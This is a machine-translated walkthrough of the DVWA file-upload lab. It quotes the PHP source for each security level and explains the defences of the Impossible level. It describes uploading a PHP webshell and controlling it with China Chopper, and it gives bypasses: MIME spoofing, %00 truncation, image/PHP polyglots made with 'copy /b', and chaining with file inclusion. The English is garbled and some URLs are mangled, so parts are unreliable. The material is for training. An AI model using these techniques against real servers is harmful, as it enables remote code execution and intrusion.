File Uplode: file upload vulnerability can be said that great harm, because directly through this vulnerability getshell. Vulnerability reason simple point that is due to some mistakes made by the user to upload a file or Web site developer operation and maintenance personnel can be used as a script (executable file) to resolve the server to perform. Apache, Tomcat, Nginx and so exposed through file upload vulnerability.
But want to Successful exploitation requires at least three conditions:
A. Effective upload point
B. uploaded files can be parsed to perform
file upload C. can be accessed
Low
Source:
1 <?php 2 3 if( isset( $_POST[ 'Upload' ] ) ) { 4 // Where are we going to be writing to? 5 $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 6 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 7 8 // Can we move the file to the upload folder? 9 if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 10 // No 11 $html .= '<pre>Your image was not uploaded.</pre>'; 12 } 13 else { 14 // Yes! 15 $html .= "<pre>{$target_path} succesfully uploaded!</pre>"; 16 } 17 } 18 19 ?>
We can see from the above source, server type upload files, the contents did not do any checking, filtering, there are obvious file upload vulnerability, after generating upload path, the server checks to see if the upload was successful and return the appropriate message, then we for file upload duck to water. In addition, I am here to tell us about basename (path, suffix)
function returns the file name portion of the path, if the optional parameter suffix is empty, the returned file name includes the suffix, and vice versa does not include the extension.
Next we come to upload executable files known path of the Trojan, upload files to some operations.
We begin a new document containing muma.txt Trojan:
After the file is uploaded:
Once you have uploaded the file successfully we can use our great Chinese kitchen knife to get webshell rights, and open the software, just fill out the path to upload the file at the address, the password is written in your document. Knife will then post by sending the server request includes gxy parameters, execute arbitrary commands on the server to obtain permission webshell. Then we can deal with random files.
Medium
Source:
1 <?php 2 3 if( isset( $_POST[ 'Upload' ] ) ) { 4 // Where are we going to be writing to? 5 $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 6 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 7 8 // File information 9 $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 10 $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 11 $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 12 13 // Is it an image? 14 if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && 15 ( $uploaded_size < 100000 ) ) { 16 17 // Can we move the file to the upload folder? 18 if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 19 // No 20 $html .= '<pre>Your image was not uploaded.</pre>'; 21 } 22 else { 23 // Yes! 24 $html .= "<pre>{$target_path} succesfully uploaded!</pre>"; 25 } 26 } 27 else { 28 // Invalid file 29 $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 30 } 31 } 32 33 ?>
Medium-level code to upload a file type, size, have been restricted, requiring file type must be jpeg or png, size can not exceed 100000B (about 97.6KB)
This a bit unpleasant up!
We came up with three methods:
Method One: file upload file contains +
Or the first to write a Trojan horse, the document type to png, namely muma.png
Once uploaded, shows success
Open kitchen knife China, the address, the password is added, then would not have to add upload address, because the principle of Chinese kitchen knife is to send post request containing parameters to upload files to perform different commands through the control parameter, and here server It will become a Trojan file parsing image files, so when you send post to their request, the server will return to the "picture" file, and does not execute the appropriate command. Here we have to think on a file containing here can make use of Medium-level file contains loopholes to get webshell rights, open the Chinese kitchen knife, right Add, enter in the address bar http://192.168.24.140/vulnerabilities/fi/ ? page = hthttp: // tp: //192.168.24.140/hackable/uploads/muma.png, select the scripting language php, can be a success!
Method Two: be capture and modify the file type:
We muma.png upload files, and then capture by capture software:
You can see the file type is image / png, try to modify the filename for the muma.php, after the modification is completed, click Forward:
Then we see a successful upload, and then open the Chinese kitchen knife or obtain permission:
Method three: truncation and are spared:
We can name the file using a 00% cut, to upload a file named: muma.php% 00.png, in fact, the equivalent of php files, but it can muddle the past. Or with a kitchen knife after China.
4, the Trojan file format to muma.php.jpeg, upload. Ethereal
2e will be changed to 00:
We have come to see the file: Then there is the Chinese chopper shot.
High
View Code
1 <?php 2 3 if( isset( $_POST[ 'Upload' ] ) ) { 4 // Where are we going to be writing to? 5 $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 6 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 7 8 // File information 9 $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 10 $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 11 $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 12 $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 13 14 // Is it an image? 15 if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && 16 ( $uploaded_size < 100000 ) && 17 getimagesize( $uploaded_tmp ) ) { 18 19 // Can we move the file to the upload folder? 20 if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { 21 // No 22 $html .= '<pre>Your image was not uploaded.</pre>'; 23 } 24 else { 25 // Yes! 26 $html .= "<pre>{$target_path} succesfully uploaded!</pre>"; 27 } 28 } 29 else { 30 // Invalid file 31 $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 32 } 33 } 34 35 ?>
strrpos(string,find,start)
Function returns a string find another string in the position of the last occurrence of the string, if the string is not found it returns false, optional parameters specified start searching where to start.
substr(string,start,length)
Returns a string from the character string starting start, length parameter is optional and represents the return characters in length
getimagesize(string filename)
Function by reading the file header, returns an image of length, width and other information, if no relevant picture file header, function error.
You can see, High-level code to read the file name last. "" String, it is desirable to limit the file types by file name, thus requiring the upload file name in the form must be "* .jpg", "*. Jpeg "," *. png "one. Meanwhile, getimagesize () function is to limit the upload file header must be the type of image.
@ 1, we need to upload the file header disguised as a picture, firstly copy command in the command line mode of the sentence Trojan file 2.php normal image files to fit together 1.jpg input copy 1.jpg / b + 2.php / a 3.jpg
@ 2, can also be added in the file header GIF89 jpg format, then the file contains the input address: http:? //127.0.0.1/vulnerabilities/fi/ page = file: /// D: / PhpStudy /PHPTutorial/WWW/hackable/uploads/1.jpg
We open the picture contains a Trojan horse, you will find a word was written in the last Trojans
Then we try to generate a Trojan file hack.jpg upload pictures, upload success.
Then you can connect a kitchen knife.
Impossible
View Code
1 <?php 2 3 if( isset( $_POST[ 'Upload' ] ) ) { 4 // Check Anti-CSRF token 5 checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 6 7 8 // File information 9 $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 10 $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 11 $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 12 $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 13 $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 14 15 // Where are we going to be writing to? 16 $target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/'; 17 //$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-'; 18 $target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 19 $temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) ); 20 $temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; 21 22 // Is it an image? 23 if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) && 24 ( $uploaded_size < 100000 ) && 25 ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) && 26 getimagesize( $uploaded_tmp ) ) { 27 28 // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD) 29 if( $uploaded_type == 'image/jpeg' ) { 30 $img = imagecreatefromjpeg( $uploaded_tmp ); 31 imagejpeg( $img, $temp_file, 100); 32 } 33 else { 34 $img = imagecreatefrompng( $uploaded_tmp ); 35 imagepng( $img, $temp_file, 9); 36 } 37 imagedestroy( $img ); 38 39 // Can we move the file to the web root from the temp folder? 40 if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) { 41 // Yes! 42 $html .= "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>"; 43 } 44 else { 45 // No 46 $html .= '<pre>Your image was not uploaded.</pre>'; 47 } 48 49 // Delete any temp files 50 if( file_exists( $temp_file ) ) 51 unlink( $temp_file ); 52 } 53 else { 54 // Invalid file 55 $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 56 } 57 } 58 59 // Generate Anti-CSRF token 60 generateSessionToken(); 61 62 ?>
in_get(varname)
Function returns the value of the option
imagecreatefromjpeg ( filename )
Function returns the image identification image files, failed to return false
imagejpeg ( image , filename , quality)
Create a JPEG image file name, an optional parameter from the image quality as the image filename, ranging from 0 (worst quality, smaller file) to 100 (best quality, biggest file).
imagedestroy( img )
Function to destroy the image resources
You can see, Impossible-level code to upload files renamed (as md5 value, resulting in 00% cut can not bypass the filtering rules), added Anti-CSRF token protection CSRF attack, while the content of the document made rigorous inspection , an attacker can not upload files containing malicious script.